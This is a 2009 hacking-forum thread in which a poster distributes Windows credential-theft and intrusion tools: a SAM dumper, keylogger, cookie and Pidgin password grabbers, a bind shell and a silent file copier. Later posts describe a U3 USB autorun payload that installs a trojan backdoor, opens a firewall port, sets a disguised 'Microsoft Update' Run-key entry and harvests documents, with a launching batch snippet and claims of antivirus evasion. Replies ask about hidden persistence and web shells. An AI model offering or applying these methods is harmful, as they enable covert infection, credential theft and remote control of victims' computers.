DingleBerries Posted March 4, 2009 Posted March 4, 2009 I felt bad about letting everyone down with my "payload". School had just started and I was extremely overwhelmed... So to make it up here are some in house tools that have never been released. I find them useful and maybe you will to. All tools are 100% legit but I am not going to upload the source, sorry but that's how I roll. All tools were written in C/C++/Python. Dingles' Berriestools for fools DISCLAIMER: MYSELF NOR THE HAK5 CREW ARE RESPONSIBLE FOR HOW YOU USE THESE TOOLS. IF YOU END UP AS BUBBAS BITCH FACE TO FACE WITH THE NSA THEN IT IS YOUR OWN FAULT. THESE TOOLS HAVE NO EVIDENT MALICIOUS PURPOSE AND ONLY YOU CAN CHOOSE HOW TO USE THEM.IP GETTERER03/03/2009 A command line external IP grabber. No need to visit whatsmyip or ipchicken, now you can run this and find your ip instantly. There is no gui and double clicking just opens a window and closes it. Open CMD and cd to the directory its in and run "ip.exe", it will print your external IP address. To log the ip to a text file just run "ip.exe>ip.txt".COPY03/03/2009 Windows copy function clone.DOWNLOAD DOWNLOADSAM DUMP03/03/2009 Copies SAM files. Just double click it. You will still have to crack the hash.DOWNLOAD DOWNLOADKEY LOGGER03/03/2009 Simple keylogger. Saves the file to winsysfile.dll, just open it with any plain text editor to read the out put.DOWNLOAD COOKIE DUMP03/10/2009 Dumps all user cookies to 'Cookies' folder.DOWNLOAD DOWNLOADPIDGIN PASSWORD GRABBER3/10/2009 Copies users pidigin account passwords stored in accounts.xml.DOWNLOAD DOWNLOADCMD BIND3/10/2009 Binds a CMD prompt to port, l337. Use in conjunction with wget to download and execute programs on a computer. This is an EXTREMELY early alpha version. What I am looking to add is, wget, execute, computer information, ect. DOWNLOAD DOWNLOADSLURPER FINAL04/1/2009 Silent file back up utility. Use to copy '.txt', '.doc'., '.whatever'. Usage, included in the rar is slurp.ini, it is very important you do not change this file name. Open the ini and edit it to suit your needs. Example: To slurp images and text files we will write:Extensions = .jpg Extensions = .txt The capitilization is important. This will support whatever you throw at it, and should work on any system, no matter the language. Stay tuned for more applications to come! Add user Rick Roller EXE Binder Text to MD5 MD5 cracker MD5 Trip Wire Hide Task Manager Have a tool you want made? Interested in something? PM me or request it here! No guarantees, but never hurts to ask. Quote
DingleBerries Posted March 4, 2009 Author Posted March 4, 2009 Browser Tools Foreword: Although people love to hate on Microsoft they did manage to get something right, sorta. IE has better local password and user protection. With Google Chrome and Firefox we are able to copy certain key files in to a new profile, or existing, and log in as that user(if there are saved passwords). These tools are ment for backing up your own accounts. Just like the yin and yang all these created for good can be used for evil. Use at your own risk, ect. Google Chrome Profile Back Up03/10/2009 Run the exe, it will create a folder based on what version you downloaded. After the files have copied(under 3 seconds) you can go to a different computer and copy them in the right place and have the same data as the computer you just copied them from. Windows XP DOWNLOAD DOWNLOAD Windows Vista DOWNLOAD DOWNLOAD FireFox 3.0.7 How to use these tools: 1. Run the exe. 2. Create a new profile on your machine, not where ever you ran the exe. 3. Exit Firefox and copy files into the new profile, %appdata%\\\*.default. 4. Start Firefox and there you go. 5. You can view stored passwords by going to Edit>Preferences>Security>Saved Passwords 6. If the passwords are protected by a master password I suggest you use FireMaster. FF Profile Copy03/10/2009 Works when there are multiple profiles installed. Copies complete FireFox Profile. Windows XP Quote
DingleBerries Posted March 10, 2009 Author Posted March 10, 2009 New Tools added. If you have any problems let me know. Quote
Ddes Posted March 11, 2009 Posted March 11, 2009 Hey, these are great. One specific feature request - I'd love to be able to specify the path of the log file for the keylogger, perhaps with a command-line flag. I'm trying to set it up to run at login, but the file isn't created in the same place as the .exe. Same for Firefox applications, actually - they don't work from the U3 drive, because even if you put the .exe in the main partition and launch it with a batch script it tries and fails to put the files in the read-only U3 partition. There might be a workaround - some other way of launching the .exe so it got the path correct - but I don't know what it might be. On the other hand, I may be able to write my own batch script which works for this. I'll get back to this one. Quote
DingleBerries Posted March 11, 2009 Author Posted March 11, 2009 Hey, these are great. One specific feature request - I'd love to be able to specify the path of the log file for the keylogger, perhaps with a command-line flag. I'm trying to set it up to run at login, but the file isn't created in the same place as the .exe. Same for Firefox applications, actually - they don't work from the U3 drive, because even if you put the .exe in the main partition and launch it with a batch script it tries and fails to put the files in the read-only U3 partition. There might be a workaround - some other way of launching the .exe so it got the path correct - but I don't know what it might be. On the other hand, I may be able to write my own batch script which works for this. I'll get back to this one. No need to put it on the U3 partition, just call it from the autorun.ini and it can stay on the flash partition. None of these should be picked up by AntiVirus so there is no need to try and keep it from deleted the file. Ill work on all that later, there are just early betas. Quote
Ddes Posted March 11, 2009 Posted March 11, 2009 I created my own version of the Firefox password program. Two main improvements - first, it dumps the files for all the profiles, and second, you can specify where to put the files. Dingleberries, I haven't looked very hard, but as far as I've seen you can't launch programs from the other partition (without some work - I did actually come up with a solution to that, but I have my own method now and I'm not sure the way I'm thinking of would work in this situation anyway - it might be looking to create the file in the same directory as autorun.ini, which does have to be on the read-only partition). The keylogger does something that - if you create a batch script to launch the exe, the winsysfile.dll is put in the same directory as the batch script regardless of where the exe is. Quote
DingleBerries Posted March 11, 2009 Author Posted March 11, 2009 FF Profile copy works when there are multiple profiles installed. Quote
Conor_M Posted March 11, 2009 Posted March 11, 2009 Cool, Nice work, I will deffinetley try these out, I tried out the keylogger and I cannot seem to find winsysfile.dll anywhere, can you enlighten me on where the logger saves it to? Quote
DingleBerries Posted March 11, 2009 Author Posted March 11, 2009 Double click it and start typing. It will create the file in the same directory. Quote
DingleBerries Posted March 15, 2009 Author Posted March 15, 2009 New file just added, Slurper 1.0 NON USB VERSION Quote
myronhinio Posted March 17, 2009 Posted March 17, 2009 i cannot make the slurper work!i must be somekind of retard:(>. i just extraxt the files of the rar in the root of my usb,double click the slurper.and then nothing happens. Quote
DingleBerries Posted March 17, 2009 Author Posted March 17, 2009 You are right... Give me 10 mins to whip up a new one. UPDATE: SLURPER V1.1 USB VERSION Quote
DingleBerries Posted March 21, 2009 Author Posted March 21, 2009 Be on the look out for a new payload with some interesting features ;) Quote
da_manwhich Posted March 30, 2009 Posted March 30, 2009 hey mate new to all this stuff can you tell me how to stop the keylogger running and keep starting up again Quote
DingleBerries Posted March 31, 2009 Author Posted March 31, 2009 Dingle Berries Load What you need A U3 device Python(for the trojan client) What it does? Install a backdoor(Terry the Trojan) Slurps Documents Opens Port for trojan Dumps PC info Writes a startup to the registry as; SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Update >>>>> c:\makPNF.exe Want to update it? Add some new shit to the end of the .bat file. DOWNLOAD Thank You in advance to those who click. UPDATE Use this .bat file instead. [size="1"]for %%i in (B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:\DingleBerries.exe set dir=%%i cd /d %dir%: DingleBerries.exe[/size] Quote
DingleBerries Posted March 31, 2009 Author Posted March 31, 2009 Nothing should be picked up by av, I coded all of it my self, with the exception of the trojan but I have full source for that. Quote
timmy Posted March 31, 2009 Posted March 31, 2009 Amazing work but would hope that it would collect more information Quote
DingleBerries Posted March 31, 2009 Author Posted March 31, 2009 Beggars cant be choosers. This is a first release made in less than 5 hours, maybe if we could get some more coders involved then there could be better product, but for now its me.. alone doing the work. All the info given is more then enough. Get wget on the machine and it is completely owned. From there you can download and execute other packages. And like it says, want to expand? Add more shit to then end of the bat to execute. Quote
Humper Posted March 31, 2009 Posted March 31, 2009 Great job here, tobad I can't really help you. Im only webcoding and designing. If you need something that only need time to work on I might could help. Just some questions, do I have to update (flash) my firmware (if so, how)? and should I put the flash folder in the main usb-drive folder? Sorry for being such an leecher, but I would help if I could. Regards Humper Quote
DingleBerries Posted March 31, 2009 Author Posted March 31, 2009 Let me explain it a bit more in detail. There are two folders(CD, Flash). The Flash folder has 2 files(2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan(makPMF i think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe. On the flash side, just put all the files on the root of your drive.Dingleberries.exe gabs some info from the pc, writes the computers info to a txt file, rights the registry value to autorun the trojan, and then calls slurp.exe(you can remove slup and replace it with PWDUMP just rename it slurp.exe) Slurp looks in the ini to find out what file types you want slurped up and puts then in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exist it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands. To use this you will need to make an ISO of the cd folder and flash that to the u3 side. Quote
0x3 Posted April 1, 2009 Posted April 1, 2009 DB , do u have some coded tools like this works on the webs server ? like IIS6 / etc ... like phpshell on unix* but what am asking for windows ? ( so if you had could u include some code to disable the firewall ) ? if u need any help in coding using perl ; python ; C/C++ give me a pm please .. i would work with guys who have a mind like you xd /0x3 Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.